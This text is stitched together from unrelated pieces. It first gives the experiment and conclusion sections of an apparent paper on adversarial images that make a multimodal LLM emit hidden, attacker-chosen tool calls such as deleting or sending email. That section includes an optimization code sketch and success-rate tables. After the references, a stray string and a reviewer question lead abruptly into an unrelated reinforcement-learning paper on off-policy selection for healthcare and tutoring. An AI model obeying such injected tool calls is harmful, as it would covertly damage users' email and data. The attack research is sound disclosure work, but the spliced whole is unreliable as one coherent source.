To evaluate the attack, we need to measure how well it generates tool invocation syntax according to the attacker's intentions (success rate for different attack variants), the stealthiness of the attack (both image stealthiness and response utility), and the generalization of the attack to unseen prompts. We test the attack on an open-source multimodal LLM — LLaMA Adapter (Zhang et al., 2023). In brief, LLaMA Adapter encodes an image into a sequence of representations, which are treated as tokens and appended to the text input, such that token generation is conditioned on the image. From now on, we refer to LLaMA Adapter as the model. Note that our attacks are only applied to the image part of the input prompt. For our attack method, we set $\alpha = 0.01$, $\lambda_i = 0.02$, $\lambda_r = 1.0$ and train for 12,000 steps with a batch size of 1. Details on how these values were picked are in Appendix A.6.

We observed significant randomness during adversarial image training. In some cases, different trials (where the only difference is the random seed) can lead to an almost perfect attack or a completely failed one. Therefore, for all experiments, we report the best result among three trials, since attackers can test the performance themselves and present only the best-performing image in public to lure users. We apply our attack method to three different base images to demonstrate the robustness of our attack across various images. Image sources and preprocessing details are in Appendix A.2.

4.1 Dataset Construction

To evaluate the generalizability of our attack, we create prompt datasets for training and evaluation independently under two categories: (1) prompts that are related to images (image-related) and (2) prompts that are unrelated to images (image-unrelated). For training, the image-related prompts are obtained by querying GPT-4 with the prompt: "Generate 100 questions related to an image". These questions are applicable to any general image, but the responses should be varied and specific to each image.
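Before turning to the remaining prompt sources, here is a minimal PyTorch-style sketch of the training loop implied by objective (3) and the hyperparameters above ($\alpha = 0.01$, $\lambda_i = 0.02$, $\lambda_r = 1.0$, batch size 1). `model_logprob` and the other names are hypothetical stand-ins for illustration, not our exact implementation.

```python
import torch

def attack_image(x, dataset, y_adv, model_logprob,
                 steps=12000, lr=0.01, lam_i=0.02, lam_r=1.0):
    """Optimize the perturbation delta over prompt-response pairs (c_j, y_j).

    model_logprob(prefix, continuation, image) is a hypothetical helper
    returning the summed log-probability of `continuation` given `prefix`
    and `image` under the frozen victim LLM.
    """
    delta = torch.zeros_like(x, requires_grad=True)   # x assumed (C, H, W) in [0, 1]
    opt = torch.optim.Adam([delta], lr=lr, betas=(0.9, 0.999))
    for step in range(steps):
        c, y = dataset[step % len(dataset)]           # batch size 1
        x_adv = (x + delta).clamp(0.0, 1.0)           # keep a valid image
        # log P(y_adv | [c; y], x + delta): the malicious instruction,
        # conditioned on the prompt and the normal response (Eq. 3).
        adv_ll = model_logprob(c + y, y_adv, x_adv)
        # lam_r * log P(y | c, x + delta): down-weighted supervision that
        # keeps the visible response natural.
        resp_ll = model_logprob(c, y, x_adv)
        # lam_i * ||delta||_2, computed per color channel as in the paper.
        img_reg = delta.reshape(delta.shape[0], -1).norm(dim=1).sum()
        loss = -adv_ll - lam_r * resp_ll + lam_i * img_reg
        opt.zero_grad()
        loss.backward()
        opt.step()
    return (x + delta).clamp(0.0, 1.0).detach()
```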
The image-unrelated prompts are the first 3200 questions in the Alpaca instruction-following dataset (Taori et al., 2023). For testing, we consider an in-domain generalization setup where the image-related prompts are created by a human volunteer instructed to create 50 different prompts similar to the prompts in the training set, and the image-unrelated prompts are a disjoint set of 100 questions in the Alpaca dataset.

Additionally, to test out-domain generalization, we create an out-domain test set. For the image-related prompts, we first generate a textual summary of the image through Bard, and then prompt GPT-4 with the summary and ask it to generate 50 questions given the image summary. Note that the questions for each image are different in this case. For the image-unrelated prompts, we prompt GPT-4 to generate 50 general questions.

Note that for the instructions from the Alpaca dataset, we omit prompts that contain an input section, as well as prompts that are too long, to keep most generations under a reasonable length of 128 tokens and speed up training. This leaves us 1803 of the 3200 image-unrelated prompts for training, and 64 of the 100 image-unrelated test prompts for evaluation. Since the training set of unrelated prompts is much larger than that of related prompts, during training we mix them with a ratio of 85 : 15.

4.2 Metrics

We feed our adversarial images to the model against prompts in the test datasets and obtain one response for each prompt. To evaluate the success and stealthiness of our attack, we consider three measures: the fraction of cases where the model emits a tool usage instruction in the response according to the attacker's intent (success rate), the similarity between the perturbed image and the clean image (image stealthiness), and the indistinguishability between the model responses with and without the attack present in terms of being reasonable and natural (response utility).

**Attack Success.** A successful attack would require an exact reproduction of the tool invocation instruction (exact match). However, a tool invocation may be produced with correct syntax but wrong arguments and fail (syntax match). We measure and report the proportion of these two cases among all tested prompt-response pairs as two metrics:

• **Syntax.** Syntax match checks whether the tool invocation instruction in the generated response follows the correct syntax. The syntax here refers to a sequence of characters that is specific to each tool. For example, in the `delete_email` attack the correct syntax consists of the tool name `function.delete_email` and a string argument `which=""`, wrapped by a pair of angle brackets. When the syntax is matched, the framework will execute the tool with the arguments provided — whether the execution exactly follows the attacker's intention depends on whether the arguments are precise. Failed syntax matches, e.g., wrong or partial function/argument keywords, will not be parsed by the framework, and those texts will be printed out and seen by users.

• **Exact.** Exact match measures whether the generated instruction in the response is exactly the same as the desired tool invocation instruction. Note that an exact match is always a syntax match.

**Image Stealthiness.** We measure the visual difference between the perturbed adversarial image and its original. The more similar the two images are, the better the stealthiness of the attack. We use the popular Structural Similarity Index Measure (SSIM) to quantify the similarity between the two images.
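As a sketch of how this metric could be computed with scikit-image (assuming images stored as float arrays in [0, 1] with channels last; these conventions are our assumptions rather than a statement of our exact pipeline):

```python
import numpy as np
from skimage.metrics import structural_similarity

def image_stealthiness(clean: np.ndarray, adv: np.ndarray) -> float:
    """SSIM between the clean and adversarial images; values near 1
    indicate the perturbation is visually imperceptible."""
    return structural_similarity(clean, adv, channel_axis=-1, data_range=1.0)
```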
An SSIM score of $\geq 0.9$ is typically not distinguishable to humans; an example is shown in Appendix A.3.

**Response Utility.** By definition, this is best measured by humans' opinions on whether the conversation between the user and model looks reasonable and natural. However, we also consider several automated metrics, since human annotation may not be possible in large-scale experiments, e.g., our in- and out-domain test sets. These automated metrics all rely on responses generated with no attack present to compare against. Note that the response represents what a user sees in the conversation — a tool invocation with correct syntax is invisible to users and thus is excluded from the response.

• **Human Preference (Human).** We ask human annotators to judge whether a response is natural and reasonable with respect to the question and the original clean image. Each prompt-response pair is judged by three graduate students majoring in Computer Science who are unrelated to this project, and we obtain the final result with a majority vote to filter out unusual preferences. The annotation guidelines can be found in Appendix A.4.

• **Unattacked Image Loss (Loss).** For each question and response, we obtain the (self-supervised) cross-entropy loss of the response given the question as a prefix, evaluated on the unattacked image. This loss measures how natural the clean model believes the response is.

• **GPT-4 Selection (Selection).** We additionally generate three responses with no attack present (clean) and mix them with the response with the attack present (attacked). We then query GPT-4 to identify the most different text among the four. The random guess rate is 25% — an accuracy higher than that indicates GPT-4 can distinguish the clean responses from the attacked responses. The prompt we used is in Appendix A.4.

• **BLEU/Rouge Scores.** We measure the BLEU/Rouge scores between the above-mentioned attacked responses and the three clean responses. Both scores measure the n-gram overlap between a text sequence and a list of reference text sequences, and are widely used in machine translation and summarization, respectively. For Rouge, we utilize the Rouge-1, Rouge-2, and Rouge-L scores as three different metrics.

### 4.3 Human Evaluation of Response Utility

We are interested in how well our attack works from human perspectives in general, and how closely the automated response utility metrics represent human preference. To understand these questions, we conduct a human evaluation on a subset of the responses from the experiment in Table 4. The subset is randomly sampled such that we have one response with the attack present for each of the 214 questions in the in-domain test set.³ We collect one response for each such sampled question with no attack present as a baseline reference.

---

²We tried to use other multimodal LLMs to imitate the human annotation but failed with poor results. Commercial ones like Bard are better but have not yet granted us API access; we leave this as future work.

Table 2: Evaluation of response utility on responses generated with and without the attack present, given both image-related and image-unrelated prompts. Observe a drop of only around 10% in human preference scores with versus without the attack.

| Responses | Human ↑ | Loss ↓ | Selection ↓ | BLEU ↑ | Rouge ↑ |
|-----------|---------|--------|-------------|--------|---------|
| **image-related** | | | | | |
| w/o attack | 48 | 1.00 | 23 | 84 | 93 |
| w/ attack | 37 | 1.20 | 83 | 38 | 65 |
| **image-unrelated** | | | | | |
| w/o attack | 86 | 0.71 | 24 | 72 | 82 |
| w/ attack | 77 | 0.84 | 69 | 34 | 56 |

**Analysis of Disagreements among Human Annotators.** The Cohen Kappa inter-annotator scores between (pairs of) annotators are in the range of 0.2 - 0.4. This indicates a certain, but not high, agreement between annotators, which is reasonable because annotators can interpret naturalness differently. As an alternative metric, we calculate the percentage of questions for which annotators find the response with the attack present better than the clean response. This percentage is less than 7%, which indicates that annotators are mostly consistent in their preference.

**Human Evaluation Result.** In Table 2, we show the human preference metric for the responses with and without the attack. We note that overall, the responses generated with the attack present show a drop of around 10% in human preference scores compared to those generated without the attack. This indicates that our attack keeps the response utility fairly indistinguishable from clean responses.

**Correlation Between Automated Metrics and Human Preferences.** We noticed that in Table 2 the GPT-4 Selection, BLEU, and Rouge metrics show unusual drops when the attack is present (much larger than the 10% drop in human preference scores). Therefore we conduct a study to understand which automated metrics best correlate with human preference. Here we only focus on the 214 responses generated with the attack present. Each automated metric represents a preference score on the naturalness and reasonableness of each response (for Loss and GPT-4 Selection we negate the value). We then calculate the AUC ROC score of the automated metrics against the human preference results (see Table 3). From the table, it is clear that for both image-related questions and image-unrelated questions, the Loss metric correlates with human preference the best among all the automated metrics, by a large margin. Therefore, we decide to use only the Loss metric for the evaluation of response utility.

A possible concern is whether the averaged response utility metric would be misleading — is it possible that the responses are less likely to be reasonable when the adversarial image successfully triggers a correct tool invocation? We verified that this is not the case in Appendix A.8.

### 4.4 Experiment Results

**The attack is successful, stealthy, and generalizable.** In Table 4 we evaluate our attack method on different attack variants and different images, on the unseen in-domain test set. For the three easier attack variants `delete_email`, `send_email`, `send_email_hard`, the success rate is close to 100% on the image-related set, and slightly lower on the image-unrelated set. For all attack variants, the SSIM score is close to 100%, and the Loss metric shows around 10% less preference than clean model generations, aligned with what we have seen in Table 2.
Even though the success rates for the latter two more challenging attacks are relatively lower, the attack remains viable from the attacker's perspective: as long as it stays stealthy, it will take effect and harm users once it has spread to enough victims.

---

³50 image-related questions for 3 images and 64 image-unrelated questions.

Table 3: AUC ROC scores for various automated metrics predicting human preference for response utility.

| Metric | related | unrelated |
|--------|---------|-----------|
| Loss | 72 | 77 |
| Selection | 50 | 59 |
| BLEU | 61 | 64 |
| Rouge-1 | 60 | 59 |
| Rouge-2 | 60 | 61 |
| Rouge-L | 61 | 58 |

Table 4: Evaluation of our attack on image stealthiness (SSIM), attack success rate (Syntax/Exact %), and response utility (Loss) on the in-domain test set for image-related and -unrelated prompts. We additionally show the $L_2$ and $L_\infty$ distances between the adversarial image and the original image. Each attack variant is applied to the three base images (rows 1-3; sources in Appendix A.2).

| Attack Variant | Image | SSIM | $L_2$ | $L_\infty$ | Syntax (rel.) | Exact (rel.) | Loss (rel.) | Syntax (unrel.) | Exact (unrel.) | Loss (unrel.) |
|----------------|-------|------|-------|-----------|---------------|--------------|-------------|-----------------|----------------|---------------|
| delete_email | 1 | 0.91 | 5.16 | 0.12 | 98 | 98 | 1.09 | 78 | 78 | 0.80 |
| | 2 | 0.92 | 8.30 | 0.71 | 90 | 90 | 1.11 | 55 | 55 | 0.82 |
| | 3 | 0.87 | 7.52 | 0.26 | 92 | 92 | 1.11 | 73 | 73 | 0.78 |
| send_email | 1 | 0.90 | 6.00 | 0.20 | 98 | 98 | 1.08 | 69 | 69 | 0.77 |
| | 2 | 0.93 | 6.35 | 0.17 | 92 | 92 | 1.18 | 61 | 58 | 0.88 |
| | 3 | 0.92 | 5.40 | 0.18 | 100 | 100 | 1.04 | 69 | 69 | 0.78 |
| send_email_hard | 1 | 0.91 | 5.18 | 0.13 | 100 | 100 | 1.14 | 61 | 56 | 0.86 |
| | 2 | 0.91 | 7.96 | 0.34 | 100 | 68 | 1.08 | 48 | 31 | 0.87 |
| | 3 | 0.88 | 6.78 | 0.19 | 86 | 0 | 1.19 | 31 | 0 | 0.78 |
| book_ticket | 1 | 0.90 | 6.05 | 0.19 | 22 | 20 | 1.51 | 9 | 8 | 0.97 |
| | 2 | 0.94 | 6.25 | 0.18 | 0 | 0 | 1.23 | 0 | 0 | 0.82 |
| | 3 | 0.91 | 5.97 | 0.14 | 46 | 44 | 1.30 | 9 | 9 | 1.07 |
| md_url_query | 1 | 0.89 | 6.38 | 0.15 | 34 | 2 | 1.26 | 23 | 6 | 0.99 |
| | 2 | 0.89 | 14.14 | 0.81 | 0 | 0 | 1.09 | 0 | 0 | 0.71 |
| | 3 | 0.91 | 5.95 | 0.18 | 32 | 10 | 1.02 | 27 | 8 | 0.77 |

Table 5: Evaluation of the trained attack from Table 4 on the out-domain test set. We pick only the three easier attack types, as they are mostly successful in the in-domain setting.

| Attack Variant | Image | SSIM | Syntax (rel.) | Exact (rel.) | Loss (rel.) | Syntax (unrel.) | Exact (unrel.) | Loss (unrel.) |
|----------------|-------|------|---------------|--------------|-------------|-----------------|----------------|---------------|
| delete_email | 1 | 0.91 | 98 | 98 | 1.18 | 66 | 66 | 0.58 |
| | 2 | 0.92 | 62 | 62 | 0.98 | 54 | 54 | 0.76 |
| | 3 | 0.87 | 92 | 92 | 0.83 | 68 | 68 | 0.58 |
| send_email | 1 | 0.90 | 100 | 100 | 1.18 | 62 | 62 | 0.60 |
| | 2 | 0.93 | 66 | 66 | 1.14 | 50 | 48 | 0.68 |
| | 3 | 0.92 | 98 | 98 | 0.84 | 80 | 80 | 0.64 |
| send_email_hard | 1 | 0.91 | 96 | 96 | 1.27 | 56 | 50 | 0.69 |
| | 2 | 0.91 | 86 | 80 | 1.00 | 28 | 20 | 0.78 |
| | 3 | 0.88 | 60 | 0 | 0.90 | 40 | 0 | 0.66 |

The attack is also generalizable to out-domain samples. In Table 5 we evaluate on the unseen, out-domain samples from the out-domain test set, using the same adversarial images as in Table 4. The results indicate that the attacked images transfer almost equally well to out-domain examples.

We also experimentally verified that (1) the response-utility-controlling weight $\lambda_r$ improves the response utility, and (2) we can sacrifice image stealthiness to make the attack more likely to succeed for hard attack variants; see Appendix A.7. These options bring more flexibility and customizability to the attack under different use cases.

5 DISCUSSION & CONCLUSION

In this paper, we propose a novel attack against multimodal LLMs integrated with third-party tools.
Adversarial images crafted in our attack are capable of manipulating the victim LLM to generate attacker-specified tool invocations following complex non-natural-language syntax, and thus can harm the confidentiality and integrity of users' resources. In addition, these adversarial images are highly stealthy, since they look benign and do not disrupt a natural and reasonable user-LLM conversation. However, our attack has the limitation of being white-box, i.e., requiring access to the model parameters, and it does not apply to closed-source LLMs. Also, the attack currently only shows proof of validity on a single multimodal LLM, not on all such models. Along this line, it would be interesting to explore black-box transferability to other multimodal LLMs.

The attack and methodology described in this paper may be utilized in a malicious way by real-world attackers. Despite the risk involved, we believe it is crucial to disclose such risks of multimodal LLMs in full before more open-weight multimodal LLMs integrated with tools are adopted in production. We will publish the entire codebase in the future. We also suggest that strict authorization should be enforced on LLMs' access to third-party tools as a bottom-line defense for now.

REFERENCES

Jean-Baptiste Alayrac, Jeff Donahue, Pauline Luc, Antoine Miech, Iain Barr, Yana Hasson, Karel Lenc, Arthur Mensch, Katherine Millican, Malcolm Reynolds, et al. Flamingo: a visual language model for few-shot learning. *Advances in Neural Information Processing Systems*, 35:23716–23736, 2022.

AutoGPT. Auto-gpt-plugins. https://github.com/Significant-Gravitas/Auto-GPT-Plugins, 2023.

Eugene Bagdasaryan, Tsung-Yin Hsieh, Ben Nassi, and Vitaly Shmatikov. (ab)using images and sounds for indirect instruction injection in multi-modal llms, 2023.

Nicholas Carlini, Milad Nasr, Christopher A. Choquette-Choo, Matthew Jagielski, Irena Gao, Anas Awadalla, Pang Wei Koh, Daphne Ippolito, Katherine Lee, Florian Tramer, and Ludwig Schmidt. Are aligned neural networks adversarially aligned?, 2023.

Danny Driess, Fei Xia, Mehdi S. M. Sajjadi, Corey Lynch, Aakanksha Chowdhery, Brian Ichter, Ayzaan Wahid, Jonathan Tompson, Quan Vuong, Tianhe Yu, Wenlong Huang, Yevgen Chebotar, Pierre Sermanet, Daniel Duckworth, Sergey Levine, Vincent Vanhoucke, Karol Hausman, Marc Toussaint, Klaus Greff, Andy Zeng, Igor Mordatch, and Pete Florence. Palm-e: An embodied multimodal language model, 2023.

Rohit Girdhar, Alaaeldin El-Nouby, Zhuang Liu, Mannat Singh, Kalyan Vasudev Alwala, Armand Joulin, and Ishan Misra. Imagebind: One embedding space to bind them all. In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition*, pp. 15180–15190, 2023.

Ian J Goodfellow, Jonathon Shlens, and Christian Szegedy. Explaining and harnessing adversarial examples. *arXiv preprint arXiv:1412.6572*, 2014.

Kai Greshake, Sahar Abdelnabi, Shailesh Mishra, Christoph Endres, Thorsten Holz, and Mario Fritz. Not what you've signed up for: Compromising real-world llm-integrated applications with indirect prompt injection, 2023.

Neel Jain, Avi Schwarzschild, Yuxin Wen, Gowthami Somepalli, John Kirchenbauer, Ping-yeh Chiang, Micah Goldblum, Aniruddha Saha, Jonas Geiping, and Tom Goldstein. Baseline defenses for adversarial attacks against aligned language models, 2023.

Diederik P Kingma and Jimmy Ba. Adam: A method for stochastic optimization. *arXiv preprint arXiv:1412.6980*, 2014.

LangChain. Langchain integrations. https://integrations.langchain.com/, 2023.
Haotian Liu, Chunyuan Li, Qingyang Wu, and Yong Jae Lee. Visual instruction tuning. *arXiv preprint arXiv:2304.08485*, 2023. Aleksander Madry, Aleksandar Makelov, Ludwig Schmidt, Dimitris Tsipras, and Adrian Vladu. Towards deep learning models resistant to adversarial attacks. *arXiv preprint arXiv:1706.06083*, 2017. Natalie Maus, Patrick Chao, Eric Wong, and Jacob Gardner. Adversarial prompting for black box foundation models. *arXiv*, 2023. Microsoft. A guidance language for controlling large language models. https://github.com/guidance-ai/guidance, 2023a. Microsoft. Microsoft semantic extension. https://github.com/microsoft/semantic-kernel/blob/334b22a78460a46b91391c1b41f79e23d55338c2/dotnet/src/Extensions/Planning.SequentialPlanner/skprompt.txt, 2023b. OpenAI. Chatgpt plugins. https://openai.com/blog/chatgpt-plugins, 2023a. OpenAI. Chatgpt plugins guides. https://platform.openai.com/docs/guides/function-calling, 2023b.
ekdurSMmbH
* Why do the authors believe clustering improves performance? If the initial state is unique to participants wouldn't it be possible to learn a single policy that performs well across all states? Why do they think this doesn't happen? Is the policy class being trained on offline data not rich enough?
Universal Off-Policy Selection for Human-Centric Systems via Participant Sub-grouping

Anonymous authors Paper under double-blind review

Abstract

Human-centric tasks like healthcare and education are characterized by heterogeneity among patients and students, resulting in different disease trajectories and learning styles that require personalized treatments or instructional interventions for specific subgroups. When deploying reinforcement learning (RL) for such tasks, off-policy selection (OPS) is essential, since it closes the loop by selecting and evaluating RL-induced policies offline, without the need for any online interaction with the participants. Many pre-existing OPS methods, however, do not consider the heterogeneity among participants. In this work, we introduce a universal off-policy selection (UOPS) approach that addresses participant heterogeneity through a multi-step procedure. Initially, it divides the participants into sub-groups, grouping together those who exhibit similar behaviors. Subsequently, it acquires OPS criteria tailored to each of these sub-groups. Consequently, when new participants arrive, they receive policy recommendations based on the sub-groups they align with. This methodology enhances the adaptability and personalization of the RL system, ensuring that policy selections align more closely with the unique characteristics of each participant or group of participants. We evaluate UOPS' effectiveness through two applications: an intelligent tutoring system that has been used in classrooms for over eight years, as well as a healthcare application for sepsis treatment and intervention. In both applications, UOPS shows significant improvements in students' learning and patient outcomes.

1 Introduction

Human-centric systems (HCSs), e.g., those used in healthcare facilities (Raghu et al., 2017; Namkoong et al., 2020; Gao et al., 2020) and intelligent education (IE) (Chi et al., 2011; Koedinger et al., 1997; VanLehn, 2006), have widely employed reinforcement learning (RL) to enhance user experience by improving the outcomes of disease treatment, knowledge gain, etc. Specifically, RL has been used in healthcare to automate treatment procedures (Raghu et al., 2017), and in IE to induce policies that automatically adapt the difficulty of course materials and help students set up and refine study plans to improve learning outcomes (Liu et al., 2022; Zhou et al., 2022). Though various existing offline RL methods can be adopted (Haarnoja et al., 2018; Kumar et al., 2020; Chen et al., 2021) for policy optimization, validation of policies' performance is often conducted via online testing (Silver et al., 2018; Wurman et al., 2022; Vinyals et al., 2019; Fu et al., 2021b). Given the long testing horizon (e.g., several years, or semesters, in healthcare and IE, respectively) and the high cost of recruiting participants, online testing is considered exceedingly time- and resource-consuming, and can sometimes even be hindered by protocols overseeing human-involved experiments; e.g., performance and safety justifications need to be provided before new medical device controllers can be tested on patients (Parvinian et al., 2018).
Recently, off-policy evaluation (OPE) methods have been proposed to tackle such challenges by estimating the performance of target (evaluation) RL policies with offline data, which only requires trajectories collected under behavioral policies given a priori; similarly, off-policy selection (OPS) targets determining the most promising policies, out of ones trained with different algorithms or hyper-parameter sets, to be used for online deployment (Chandak et al., 2022; Fu et al., 2021a; Nie et al., 2022; Yang et al., 2022; Zhang & Jiang, 2021). However, most existing OPS and OPE methods are designed in the context of homogeneous agents, such as in robotics or games, where characteristics of the agents can be captured by their specifications, which are in general assumed fully known (e.g., degrees of freedom, angular constraints of each joint). In contrast, in HCSs, the participants can have highly diverse backgrounds, where each person may be associated with unique underlying characteristics that are not straightforward to capture individually, due to the partial observability of participants' mind states and the limited size of the cohort that can be recruited for experiments with HCSs. For example, patients participating in healthcare research studies could have different health/disease records, while the students using an intelligent tutoring system in IE may have different mindsets toward studying the course. As a result, the optimal criteria for selecting the policy to be deployed to each participant can vary, and, more importantly, it would be intractable for existing OPS/OPE frameworks to determine what the policy selection criteria should be for a new participant who has just joined the cohort.

In this work, we introduce universal off-policy selection (UOPS), which addresses the problem of determining the OPS criteria needed for each new participant joining the cohort (i.e., at $t = 0$ only, without using information obtained from $t \geq 1$ onwards), assuming that we have access to offline trajectories for a small batch of participants a priori, i.e., the offline data. Specifically, it first partitions the participants from the offline dataset into sub-groups, clustering together the ones pertaining to similar behaviors. Then, an unbiased value function estimator, with bounded variance, is developed to determine the policy selection criteria for each sub-group. At last, when new participants join, they will be recommended the policies selected according to the sub-groups they fall within. Note that UOPS is distinguished from the typical off-policy selection (OPS) setup in the sense that the major goal of prior OPS approaches is to select the best policy over the entire population, while UOPS aims to decide the best policy for each participant who arrives at the HCS on-the-fly, leveraging only the information observed at the initial step ($t = 0$).

The key contributions of this work are summarized as follows: (i) We introduce the UOPS framework, which is critical for closing the gap between offline RL policy optimization and OPS in selecting policies to be deployed to individual participants in HCSs. To the best of our knowledge, this is the first framework that considers the new-participant-arrival problem in the context of OPS. (ii) We conduct extensive experiments to evaluate UOPS in a real-world IE system, with 1,288 students participating over 5 years.
Results show that UOPS improved learning outcomes by 208% compared to policy selection criteria hand-crafted by instructors. Moreover, it leads to a 136% increase in outcomes compared to policies selected by existing OPS methods. (iii) UOPS is also evaluated on an important healthcare application, i.e., septic shock treatment (Raghu et al., 2017; Namkoong et al., 2020; Oberst & Sontag, 2019), where it can accurately identify the best treatment policies to be deployed to incoming patients, and it outperforms existing OPS methods.

## 2 Universal Off-Policy Selection (UOPS)

In this section, we introduce the UOPS method, which determines the policy to be deployed to new participants that join an existing cohort, conditioned only on their initial states. Specifically, the participants pertaining to the offline dataset are partitioned into sub-groups according to their past behavior. Then, a variational auto-encoder (VAE) model is used to generate synthetic trajectories for each sub-group, augmenting the dataset and improving the state-action coverage. Moreover, an unbiased value function estimator, with bounded variance, is developed to determine the policy selection criteria for each sub-group. At last, when new participants join, they will be recommended the policies conditioned on the sub-groups they fall within, respectively. We start with a subsection that introduces the problem formulation formally.

### 2.1 Problem Formulation

The HCS environment is formulated as a human-centric Markov decision process (HI-MDP), which is a 7-tuple $(S, A, P, S_0, R, I, \gamma)$. Specifically, $S$ is the state space, $A$ is the action space, $P : S \times A \rightarrow S$ defines the transition dynamics from the current state and action to the next state, $S_0$ defines the initial state distribution, $R : S \times A \rightarrow \mathbb{R}$ is the reward function, $I$ is the set of participants involved in the HCS, and $\gamma \in (0, 1]$ is the discount factor. Episodes are of finite horizon $T$. At each time-step $t$ in online policy deployment, the agent observes the state $s_t \in S$ of the environment, then chooses an action $a_t \in A$ following the target (evaluation) policy $\pi$. The environment accordingly provides a reward $r_t = R(s_t, a_t)$, and the agent observes the next state $s_{t+1}$ determined by $P$. A trajectory is denoted as $\tau^{(i)}_\pi = [\ldots, (s^{(i)}_t, a^{(i)}_t, r^{(i)}_t, s^{(i)}_{t+1}), \ldots]_{t=1}^T$. Moreover, we consider having access to a historical trajectory set (i.e., offline dataset) collected under a behavioral policy $\beta \neq \pi$, $D_\beta = \{\ldots, \tau^{(i)}_\beta, \ldots\}_{i=1}^N$, which consists of $N$ trajectories.

We first make two assumptions, regarding the correspondence between trajectories and participants, and the initial state distribution for each participant, respectively.

**Assumption 1 (Trajectory-Participant Correspondence).** As a participant in human-centric experiments is in general unlikely to undergo exactly the same procedure more than once under the topic being studied, we assume that there exists a unique correspondence between each trajectory $\tau^{(i)}$ and the participant ($i \in I$) from which the trajectory is logged. We can henceforth use $i$ to index either a trajectory from the offline dataset or the corresponding participant, depending on the context.
**Assumption 2 (Independent Initial State Distributions).** The initial state of each trajectory $s_0^{(i)} \in \tau^{(i)}$, corresponding to a unique (the $i$-th) participant following the assumption above, is sampled from an initial state distribution $S_0(i)$ conditioned on the $i$-th participant's characteristics and past records (i.e., specific to the $i$-th trajectory), and is independent from all other $S_0(j)$'s, where $j \in [1, N] \setminus i$.

The assumptions above reflect scenarios that are specific to HCSs – for example, a patient is unlikely to be prescribed the same surgery twice. Even if the patient has to undergo a follow-up surgery of a similar type (e.g., mostly seen in trauma or orthopedics departments), the second time the patient comes in, he/she will start with a rather different initial state, since the pathology may already have been intervened upon as a result of the last visit. Consequently, one can treat such a visit as a new (synthetic) participant who has just joined and has the health record updated after the last visit. In other words, a participant as considered in this paper can be generalized, e.g., to a hospital visit, or a student participating in a specific course supported by intelligent education (IE) systems, depending on the context. Moreover, Assumption 2 directly follows from the philosophy illustrated in Assumption 1 – the initial state of each trajectory depends on the corresponding participant's unique characteristics and historical records before joining the experiment/cohort, and can be considered mutually independent across all participants. Now we define the goal for UOPS.

**Problem 1.** The goal of UOPS is to select the best policy $\pi$ from a set of pre-trained (candidate) policies $\Pi$, $\pi \in \Pi$, for each of the new participants $i' \in \{N + 1, N + 2, \ldots\}$ joining (i.e., arriving at) the HCS with an observable initial state $s_0 \sim S_0(i')$ (while the rest of the trajectory remains unobservable), that maximizes the expected accumulated return $V^\pi$, $\max_{\pi \in \Pi} V^\pi$, over the full horizon $T$; here $V^\pi = \mathbb{E}_{s_0 \sim S_0(i'),\, (s_{t>0}, a_{t>0}) \sim \rho^\pi,\, r_t \sim R}\left[\sum_{t=1}^{T} \gamma^{t-1} r_t \,\middle|\, \pi\right]$, and $\rho^\pi$ is the state-action visitation distribution under $\pi$ from step $t = 1$ onwards.

Note that the problem formulation here differs from the typical OPS/OPE setup used in existing works (Jiang & Li, 2016; Thomas & Brunskill, 2016; Doroudi et al., 2017; Yang et al., 2022; Zhang et al., 2021; Gao et al., 2023; Le et al., 2019), as only the initial state $s_0$ is available for policy selection. Such a formulation is aligned with use cases in HCSs; e.g., a treatment plan needs to be laid out soon after a new patient is admitted to the intensive care unit (ICU) of a medical center. However, most indirect OPS methods, such as importance sampling (IS) (Precup, 2000; Doroudi et al., 2017) and doubly robust (DR) estimators (Jiang & Li, 2016; Thomas & Brunskill, 2016), require the entire trajectory to be observed in order to estimate $V^\pi$. Though direct methods like fitted-Q evaluation (FQE) (Le et al., 2019) could be used as a workaround, they do not take into account the unique characteristics of each participant, which play a crucial role in HCS applications; results in Section 3 show that they in general underperform in the real-world IE experiment. To address both challenges, we introduce the UOPS approach, starting with the sub-group partitioning step introduced below.
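To fix notation before moving on, the following is a minimal sketch of the data structures implied by this formulation; the field and type names are our own illustrations, not part of the formal definition.

```python
from dataclasses import dataclass
from typing import List
import numpy as np

@dataclass
class Transition:
    s: np.ndarray        # state s_t
    a: int               # action a_t
    r: float             # reward r_t = R(s_t, a_t)
    s_next: np.ndarray   # next state s_{t+1}

@dataclass
class Trajectory:
    participant_id: int          # unique per Assumption 1
    steps: List[Transition]      # length T; steps[0].s ~ S_0(i), per Assumption 2

# Offline dataset D_beta: one trajectory per participant, logged under beta.
OfflineDataset = List[Trajectory]
```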
### 2.2 Sub-group Partitioning

In this sub-section, we introduce the sub-group partitioning step that partitions the participants in the offline dataset into sub-groups. Furthermore, value functions over all candidate policies $\pi \in \Pi$ are learned for each sub-group, to be leveraged as the OPS criteria for that sub-group.

**Sub-group partitioning.** The partitioning is performed over the initial state of each trajectory in the offline dataset, $\tau_\beta \in \mathcal{D}$. Given Assumptions 1 and 2 and the fact that the $S_0(i)$'s in general only share limited support across participants (i.e., every human has unique characteristics and past experience), such partitioning is essentially performed at the per-participant level. Specifically, we consider partitioning the participants into $M$ sub-groups. Then for all sub-groups $K_m$ in the set of sub-groups $\mathcal{K} = \{K_1, \ldots, K_M\}$, we have $\bigcup_{m=1}^{M} K_m = S_0$ and $K_m \cap K_n = \emptyset, \forall m \neq n$. The total number of groups $M$ needed can be determined using silhouette scores (Hallac et al., 2017). Denote the partition function $k(\cdot) : S_0 \rightarrow \mathcal{K}$. We then define the value function specific to each sub-group.

**Definition 1 (Value Function per Sub-group).** The value function over policy $\pi$, $V^\pi_{K_m}$, specific to the sub-group $K_m$, is the expected accumulated return over the initial states that correspond to the set of participants $\mathcal{I}_m = \{i \mid k(s_0^{(i)}) = K_m, i \in \mathcal{I}\}$ residing in the same sub-group. Specifically,

$$V^\pi_{K_m} = \mathbb{E}_{s_0 \sim \text{Unif}(\{S_0(i) \mid i \in \mathcal{I}_m\}),\, (s_{t>0}, a_{t>0}) \sim \rho^\pi,\, r_t \sim R}\left[\sum_{t=1}^{T} \gamma^{t-1} r_t \,\middle|\, \pi\right],$$

where $s_0 \sim \text{Unif}(\{S_0(i) \mid i \in \mathcal{I}_m\})$ represents that $s_0$ is sampled from a uniformly weighted mixture of the distributions $\{S_0(i) \mid i \in \mathcal{I}_m\}$ pertaining to sub-group $K_m$.

